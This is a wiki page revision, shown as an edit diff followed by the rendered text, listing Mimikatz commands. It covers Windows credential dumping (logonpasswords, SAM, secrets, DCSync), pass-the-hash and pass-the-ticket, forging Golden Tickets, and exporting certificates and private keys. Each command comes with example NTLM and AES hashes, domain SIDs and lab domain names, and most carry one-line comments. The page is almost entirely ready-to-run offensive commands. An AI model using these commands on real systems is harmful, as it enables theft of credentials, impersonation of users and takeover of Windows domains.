No edit summary |
No edit summary |
||
| Line 4: | Line 4: | ||
==sekurlsa== | ==sekurlsa== | ||
<syntaxhighlight lang="powershell"> | <syntaxhighlight lang="powershell"> | ||
# | # Command is used to extract logon passwords from the Windows Security Support Provider (SSP) | ||
sekurlsa::logonpasswords | sekurlsa::logonpasswords | ||
# Command will extract all logon passwords, including those of network connections. | |||
sekurlsa::logonPasswords full | sekurlsa::logonPasswords full | ||
# Command will export Kerberos tickets to a file. | |||
sekurlsa::tickets /export | sekurlsa::tickets /export | ||
# | # Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command. | ||
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd | sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd | ||
</syntaxhighlight | </syntaxhighlight> | ||
==kerberos== | ==kerberos== | ||
| Line 18: | Line 18: | ||
# This command will list and export Kerberos tickets to a file. | # This command will list and export Kerberos tickets to a file. | ||
kerberos::list /export | kerberos::list /export | ||
This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT. | # This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT. | ||
kerberos::ptt c:\chocolate.kirbi | kerberos::ptt c:\chocolate.kirbi | ||
This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID | # This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID | ||
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi | kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi | ||
</syntaxhighlight | </syntaxhighlight> | ||
==crypto== | |||
<syntaxhighlight lang="powershell"> | |||
This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system. | |||
crypto::capi | crypto::capi | ||
# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system. | |||
crypto::cng | crypto::cng | ||
crypto::certificates /export | # This command is used to export certificates from a Windows system. | ||
crypto::certificates /export | |||
# This command is used to export certificates from the local machine certificate store of a Windows system. | |||
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE | crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE | ||
# This command is used to export cryptographic keys from a Windows system. | |||
crypto::keys /export | crypto::keys /export | ||
# This command is used to export cryptographic keys from the local machine of a Windows system. | |||
crypto::keys /machine /export | crypto::keys /machine /export | ||
</syntaxhighlight> | |||
#general | |||
privilege::debug | |||
log | |||
log customlogfilename.log | |||
#vault & lsadump | #vault & lsadump | ||
| Line 71: | Line 80: | ||
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi | kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi | ||
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080 | kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080 | ||
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi | kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi | ||
#tgt | #tgt | ||
Revision as of 18:34, 25 January 2023
Commands
sekurlsa
# Command is used to extract logon passwords from the Windows Security Support Provider (SSP)
sekurlsa::logonpasswords
# Command will extract all logon passwords, including those of network connections.
sekurlsa::logonPasswords full
# Command will export Kerberos tickets to a file.
sekurlsa::tickets /export
# Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos
# This command will list and export Kerberos tickets to a file.
kerberos::list /export
# This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT.
kerberos::ptt c:\chocolate.kirbi
# This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto
This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system.
crypto::capi
# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system.
crypto::cng
# This command is used to export certificates from a Windows system.
crypto::certificates /export
# This command is used to export certificates from the local machine certificate store of a Windows system.
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
# This command is used to export cryptographic keys from a Windows system.
crypto::keys /export
# This command is used to export cryptographic keys from the local machine of a Windows system.
crypto::keys /machine /export
- general
privilege::debug log log customlogfilename.log
- vault & lsadump
vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local
- pth
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
- ekeys
sekurlsa::ekeys
- dpapi
sekurlsa::dpapi
- minidump
sekurlsa::minidump lsass.dmp
- ptt
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi
- golden/silver
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080 kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
- tgt
kerberos::tgt
- purge
kerberos::purge